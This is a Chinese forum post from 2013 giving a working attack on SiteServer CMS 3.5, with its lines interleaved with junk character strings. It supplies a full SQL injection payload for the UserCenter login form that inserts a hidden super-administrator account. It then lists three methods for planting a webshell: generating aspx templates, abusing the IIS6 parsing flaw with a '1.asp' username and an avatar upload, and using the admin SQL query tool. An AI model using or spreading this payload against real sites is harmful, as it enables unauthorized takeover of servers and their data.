经测试秒杀最新的3.5版" t" `1 O3 W0 P0 N% O+ P) A
stieserver官网:www.siteserver.cn
# y" r$ Z- i. i; Z# y0 r+ PEXP:
( f) P# M1 [9 m( A' V直接访问UserCenter/login.aspx3 i& Q0 M; Y4 b1 E2 y8 t+ q
用户名处输入:/ k6 { U6 }4 p: s$ C
`. f) D/ h$ s" W- t$ Y( A
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
Y6 o" l. u4 l! w5 X3 j密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
2 o$ ^( e" f- @2 W) @* V, |: n/ x& f之后再访问后台SiteServer/login.aspx用插入的用户登陆
, i, q7 P, x$ w/ ~- _+ Z8 S/ C( D9 d后台拿webshell的三种方法:
2 U: L4 `6 Q \8 s o- v2 ]一、% h( F3 u" B5 X% D
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
% {# U9 b) a+ E. |6 K8 w! [. w二、/ N5 T/ s8 W- M& C
成员权限-》添加用户-》用户名为:1.asp
( c2 y, `4 Z. B" S( {8 }http://127.0.0.1/usercenter/
/ r# D+ W# H+ I/ ^/ ]* K9 A用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell: k! `; _1 K" |. D
(ps:后台添加用户时不会验证是否含有非法字符)
% x6 n% `! I C1 c三、
3 z) U8 S# F6 L5 Z系统工具-》实用工具-》机器参数查看
- o+ b# O7 E8 L5 v' R可以看到数据库类型、名称,WEB路径
9 t; Y4 N1 q/ @' e% `0 p" Y系统工具-》数据库工具-》SQL语句查询
# J9 j; G9 }8 z% U' z/ o这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对